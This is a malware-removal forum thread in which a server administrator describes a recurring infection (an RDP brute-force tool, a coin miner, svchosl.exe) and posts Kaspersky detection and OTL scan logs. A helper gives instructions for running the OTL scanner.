
Dear experts,

Like the topics https://forums.malwarebytes.org/index.php?showtopic=134921 and https://forums.malwarebytes.org/index.php?showtopic=134318, this server seems to be infected with a nasty combination of malware.

Both Microsoft Forefront Endpoint Protection as well as MalwareBytes Anti-Malware detect svchosl.exe when running a scan. Both successfully remove the threat. A few hours/days later the infection returns.


MalwareBytes Anti-Rootkit doesn't find anything.

FRST64 doesn't find anything.

TDSSKiller doesn't find anything (haven't run it with Modules enabled yet, though).

ComboFix obviously doesn't run on a server.

AdwCleaner doesn't find anything.

DDS.com/scr don't run on a server, so no logs, sorry.

ThreatExpert Memory scanner doesn't find anything.

RogueKillerX64 doesn't find anything.

JRT doesn't find anything.

Ran Kaspersky Rescue Disk 10 from a USB drive; it successfully removed the threat. However, the infection returned.

Here's the log though:

Objects Scan: completed <1 minute ago   (events: 26, objects: 265366, time: 00:37:59)    
1/20/14 3:00 PM    Task completed            
1/20/14 3:00 PM    Deleted: HackTool.Win32.BruteForce.pma (analysis according to the database of dangerous URLs)    C:/Windows/tanechka/svchosl.exe        
1/20/14 2:57 PM    Detected: HackTool.Win32.BruteForce.pma (analysis according to the database of dangerous URLs)    C:/Windows/tanechka/svchosl.exe        
1/20/14 2:57 PM    Deleted: Trojan.BAT.Agent.alo    C:/Windows/tanechka/rdbrute.cmd        
1/20/14 2:57 PM    Detected: Trojan.BAT.Agent.alo    C:/Windows/tanechka/rdbrute.cmd        
1/20/14 2:57 PM    Deleted: Trojan.Win32.Miner.aai    C:/Windows/pts/pts_minerd32.exe        
1/20/14 2:53 PM    Detected: Trojan.Win32.Miner.aai    C:/Windows/pts/pts_minerd32.exe        
1/20/14 2:53 PM    Deleted: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar        
1/20/14 2:50 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:50 PM    Deleted: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:47 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:35 PM    Untreated: HackTool.Win32.BruteForce.pma (analysis according to the database of dangerous URLs)    C:/Windows/tanechka/svchosl.exe    Postponed    
1/20/14 2:35 PM    Detected: HackTool.Win32.BruteForce.pma (analysis according to the database of dangerous URLs)    C:/Windows/tanechka/svchosl.exe        
1/20/14 2:35 PM    Untreated: Trojan.BAT.Agent.alo    C:/Windows/tanechka/rdbrute.cmd    Postponed    
1/20/14 2:35 PM    Detected: Trojan.BAT.Agent.alo    C:/Windows/tanechka/rdbrute.cmd        
1/20/14 2:31 PM    Untreated: Trojan.Win32.Miner.aai    C:/Windows/pts/pts_minerd32.exe    Postponed    
1/20/14 2:31 PM    Detected: Trojan.Win32.Miner.aai    C:/Windows/pts/pts_minerd32.exe        
1/20/14 2:25 PM    Untreated: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe    Postponed    
1/20/14 2:25 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:25 PM    Untreated: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe    Postponed    
1/20/14 2:25 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:23 PM    Untreated: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe    Postponed    
1/20/14 2:23 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:23 PM    Untreated: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe    Postponed    
1/20/14 2:23 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:22 PM    Task started


I have no idea how DUBrute + Scanner IP got on the Administrator desktop. Or how Google Chrome was installed. Or why I had realvnc.exe running. Or why I suddenly see Administrator logged onto the server via RDP from a WINNT-XXXXXX machine. Passwords have been changed, however.


I don't see any Registry Run values, Scheduled Tasks, Startup entries, anything like that.


I am officially at a loss. I would appreciate any assistance I can get! I will try to respond as quickly as possible; the server can be rebooted at night time.

Root Admin

Please download OTL.exe by OldTimer to your Desktop.

  • Close all windows and double click OTL.exe.
  • Click Run Scan and let the program run uninterrupted.
  • It will produce two logs for you, one will pop up - OTL.txt, the other will be saved on your Desktop - Extras.txt. Post both logs in this thread.
  • You may need to use two posts to get it all.


OTL.Txt log:

OTL logfile created on: 2/12/2014 2:47:42 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\administrator.COMPANY\Desktop
64bit- Server Standard Edition (full installation) Service Pack 1 (Version = 6.1.7601) - Type = NTServer
Internet Explorer (Version = 9.10.9200.16736)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
13.99 Gb Total Physical Memory | 2.37 Gb Available Physical Memory | 16.94% Memory free
27.98 Gb Paging File | 16.20 Gb Available in Paging File | 57.90% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 60.00 Gb Total Space | 31.49 Gb Free Space | 52.49% Space Free | Partition Type: NTFS
Drive D: | 486.80 Gb Total Space | 145.86 Gb Free Space | 29.96% Space Free | Partition Type: NTFS
 
Computer Name: COMPANY-HV | User Name: administrator | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - File not found --
PRC - [2014/02/12 14:47:02 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\administrator.COMPANY\Desktop\OTL.exe
PRC - [2010/11/21 04:24:24 | 000,042,496 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ftp.exe
PRC - [2010/11/21 04:24:06 | 000,302,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cmd.exe
 
 
========== Modules (No Company Name) ==========
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2013/12/07 07:20:03 | 000,192,512 | ---- | M] () [Auto | Running] -- C:\Windows\SysNative\sclient.exe -- (sclient)
SRV:64bit: - [2012/10/30 16:05:04 | 000,407,176 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\AdtAgent.exe -- (AdtAgent)
SRV:64bit: - [2012/10/30 16:05:02 | 000,633,968 | ---- | M] (Microsoft Corp.) [Disabled | Stopped] -- C:\Program Files\System Center Operations Manager\Gateway\APMDOTNETAgent\InterceptSvc.exe -- (System Center Management APM)
SRV:64bit: - [2012/10/30 16:05:02 | 000,025,200 | ---- | M] (Microsoft Corp.) [Auto | Running] -- C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe -- (HealthService)
SRV:64bit: - [2010/11/21 04:25:10 | 000,049,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\snmp.exe -- (SNMP)
SRV:64bit: - [2010/11/21 04:24:50 | 000,193,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\vhdsvc.dll -- (vhdsvc)
SRV:64bit: - [2010/11/21 04:24:49 | 004,625,408 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\vmms.exe -- (vmms)
SRV:64bit: - [2010/11/21 04:24:49 | 000,407,040 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nvspwmi.dll -- (nvspwmi)
SRV:64bit: - [2010/11/11 14:36:38 | 000,282,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2010/11/11 14:36:38 | 000,012,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2010/05/26 17:27:34 | 000,015,464 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\CpqMgmt\cqmgserv\cqmgserv.exe -- (CqMgServ)
SRV:64bit: - [2010/05/26 17:25:44 | 000,268,392 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Windows\SysNative\CIMntfy\cimntfy.exe -- (CIMnotify)
SRV:64bit: - [2010/05/26 17:25:20 | 000,015,464 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\CpqMgmt\cqmghost\cqmghost.exe -- (CqMgHost)
SRV:64bit: - [2010/04/28 16:38:02 | 000,009,728 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\CPQNiMgt\cpqnimgt.exe -- (CpqNicMgmt)
SRV:64bit: - [2010/04/09 03:33:00 | 000,020,992 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\CpqMgmt\cqmgstor\cqmgstor.exe -- (CqMgStor)
SRV:64bit: - [2010/03/19 12:25:30 | 000,167,424 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files\HP\Cissesrv\cissesrv.exe -- (Cissesrv)
SRV:64bit: - [2010/01/25 14:50:28 | 000,017,960 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\sysdown.exe -- (sysdown)
SRV:64bit: - [2009/07/14 02:41:53 | 000,014,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sacsvr.dll -- (sacsvr)
SRV:64bit: - [2009/07/14 02:40:52 | 000,025,600 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\FCRegSvc.dll -- (FCRegSvc)
SRV:64bit: - [2009/07/14 02:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV:64bit: - [2009/07/14 02:39:31 | 000,091,648 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rsopprov.exe -- (RSoPProv)
SRV:64bit: - [2008/11/14 12:21:50 | 000,022,568 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\cpqrcmc.exe -- (CpqRcmc)
SRV - [2010/11/21 04:25:22 | 000,047,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\snmp.exe -- (SNMP)
SRV - [2010/03/25 13:52:58 | 001,307,648 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe -- (cpqvcagent)
SRV - [2010/01/28 11:13:00 | 002,041,856 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\hp\hpsmh\bin\smhstart.exe -- (SysMgmtHp)
SRV - [2009/06/10 22:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2012/03/01 07:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/05/14 05:57:00 | 000,407,552 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmswitch.sys -- (VMSP)
DRV:64bit: - [2011/05/14 05:57:00 | 000,407,552 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vmswitch.sys -- (VMSMP)
DRV:64bit: - [2011/05/14 05:56:44 | 000,120,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\storvsp.sys -- (storvsp)
DRV:64bit: - [2010/11/21 04:24:50 | 000,119,168 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\hvboot.sys -- (hvboot)
DRV:64bit: - [2010/11/21 04:24:30 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/21 04:24:00 | 000,181,760 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Vid.sys -- (Vid)
DRV:64bit: - [2010/11/21 04:24:00 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2010/11/21 04:24:00 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/21 04:24:00 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2010/11/21 04:24:00 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/11/21 04:24:00 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/11/21 04:24:00 | 000,020,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\passthruparser.sys -- (passthruparser)
DRV:64bit: - [2010/11/21 04:24:00 | 000,017,408 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vhdparser.sys -- (vhdparser)
DRV:64bit: - [2010/10/24 21:25:38 | 000,072,064 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2010/04/30 08:42:40 | 000,384,040 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (q57nd60a)
DRV:64bit: - [2010/04/30 08:42:40 | 000,384,040 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2010/02/24 06:07:10 | 000,225,792 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\cpqteam.sys -- (CPQTeam)
DRV:64bit: - [2010/02/22 13:02:18 | 000,156,776 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpCISSs2.sys -- (HpCISSs2)
DRV:64bit: - [2010/01/25 14:50:26 | 000,160,296 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\hpqilo2.sys -- (hpqilo2)
DRV:64bit: - [2009/07/14 02:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/14 02:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/14 02:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/14 02:45:45 | 000,096,320 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\sacdrv.sys -- (sacdrv)
DRV:64bit: - [2009/06/24 23:33:46 | 002,210,816 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ati2mtag.sys -- (ati2mtag)
DRV:64bit: - [2009/06/10 21:35:30 | 000,035,328 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\qd260x64.sys -- (ioatdma)
DRV:64bit: - [2009/06/10 21:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 21:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/05/11 16:08:08 | 000,051,752 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\cpqcidrv.sys -- (CpqCiDrv)
DRV - [2009/07/14 02:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL =
IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages =

IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR
IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
 
========== FireFox ==========
 
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
 
 
 
O1 HOSTS File: ([2013/12/03 19:46:41 | 000,000,862 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 188.122.70.10         scom01.asapnet.local
O4:64bit: - HKLM..\Run: [CPQTEAM] C:\Program Files\HP\NCU\cpqteam.exe (Hewlett-Packard Company)
O4:64bit: - HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: ShowSuperHidden = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoWelcomeScreen = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: disablecad = 0
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds.microsoft.com/FTM/TransferSource/grTransferCtrl.cab (DLC Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = COMPANY.local
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C7B52165-FFD6-4475-A339-E29F9F34975A}: NameServer = 192.168.10.11,8.8.8.8
O18:64bit: - Protocol\Handler\hpapp - No CLSID value found
O18:64bit: - Protocol\Handler\hpapp\Apps - No CLSID value found
O18 - Protocol\Handler\hpapp {24F45006-5BD9-41B7-9BD9-5F8921C8EBD1} - C:\Program Files (x86)\Compaq\Cpqacuxe\Bin\hpapp.dll (Hewlett-Packard Company)
O18 - Protocol\Handler\hpapp\Apps - No CLSID value found
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\AtiExtEvent: DllName - (Ati2evxx.dll) -  File not found
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/11/30 11:59:12 | 000,006,101 | ---- | M] () - C:\autounattend.xml.old -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/02/12 14:47:02 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\administrator.COMPANY\Desktop\OTL.exe
[2014/02/07 15:04:54 | 000,000,000 | ---D | C] -- C:\Windows\mtc
[2014/02/07 14:57:21 | 000,000,000 | ---D | C] -- C:\Windows\pts
[2014/02/07 14:45:43 | 000,000,000 | ---D | C] -- C:\Windows\xpm
[2014/02/07 14:42:10 | 000,000,000 | ---D | C] -- C:\Windows\tanechka
[2014/02/05 09:53:33 | 000,000,000 | ---D | C] -- C:\FRST
[2014/02/05 09:52:10 | 002,080,256 | ---- | C] (Farbar) -- C:\Users\administrator.COMPANY\Desktop\FRST64.exe
[2014/01/29 14:03:31 | 000,119,000 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/01/29 14:03:13 | 000,091,352 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/01/29 09:39:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2014/01/29 09:38:48 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2014/01/29 09:38:47 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2014/01/29 09:34:29 | 010,285,040 | ---- | C] (Malwarebytes Corporation                                    ) -- C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
[2014/01/26 19:52:19 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Security Client
[2014/01/26 19:52:15 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Security Client
[2014/01/26 02:55:47 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\Macromed
[2014/01/26 02:55:44 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\Macromed
[2014/01/23 12:58:56 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\AppData\Roaming\Malwarebytes
[2014/01/23 12:08:40 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ThreatExpert Memory Scanner
[2014/01/23 12:08:39 | 000,000,000 | ---D | C] -- C:\Program Files\ThreatExpert Memory Scanner
[2014/01/23 12:08:18 | 001,536,352 | ---- | C] (Threat Expert Ltd.                                          ) -- C:\Users\administrator.COMPANY\Desktop\TEMSSetup-x64.exe
[2014/01/23 11:36:16 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2014/01/23 11:36:11 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2014/01/23 11:33:56 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\Desktop\temp
[2014/01/23 11:20:16 | 012,589,848 | ---- | C] (Malwarebytes Corp.) -- C:\Users\administrator.COMPANY\Desktop\mbar-1.07.0.1009.exe
[2014/01/23 11:11:37 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/01/23 11:10:50 | 001,037,068 | ---- | C] (Thisisu) -- C:\Users\administrator.COMPANY\Desktop\JRT.exe
[2014/01/23 11:08:18 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/01/23 11:03:00 | 005,173,757 | ---- | C] (Swearware) -- C:\Users\administrator.COMPANY\Desktop\ComboFix.exe
[2014/01/23 10:43:23 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\Desktop\RK_Quarantine
[2014/01/20 15:08:15 | 000,000,000 | ---D | C] -- C:\Kaspersky Rescue Disk 10.0
[2014/01/17 10:52:47 | 000,000,000 | ---D | C] -- C:\ProgramData\SeriousBit
[2014/01/17 10:52:32 | 000,041,392 | ---- | C] (SeriousBit) -- C:\Windows\SysNative\drivers\nbdrv.sys
[2014/01/17 10:52:11 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\AppData\Local\Programs
[2014/01/15 12:25:47 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\AppData\Roaming\WinRAR
[2014/01/15 11:14:08 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\restore
 
========== Files - Modified Within 30 Days ==========
 
[2014/02/12 14:47:02 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\administrator.COMPANY\Desktop\OTL.exe
[2014/02/12 14:45:47 | 000,000,908 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/02/12 14:12:00 | 000,000,912 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/02/12 08:08:58 | 000,000,894 | ---- | M] () -- C:\Windows\SysWow64\tmp62.cmd
[2014/02/12 08:01:31 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp61.cmd
[2014/02/11 05:04:06 | 000,000,890 | ---- | M] () -- C:\Windows\SysWow64\tmp59.cmd
[2014/02/11 05:00:38 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp58.cmd
[2014/02/11 04:57:11 | 000,001,462 | ---- | M] () -- C:\Windows\SysWow64\tmp57.cmd
[2014/02/10 12:06:53 | 000,001,990 | -H-- | M] () -- C:\Users\administrator.COMPANY\Documents\Default.rdp
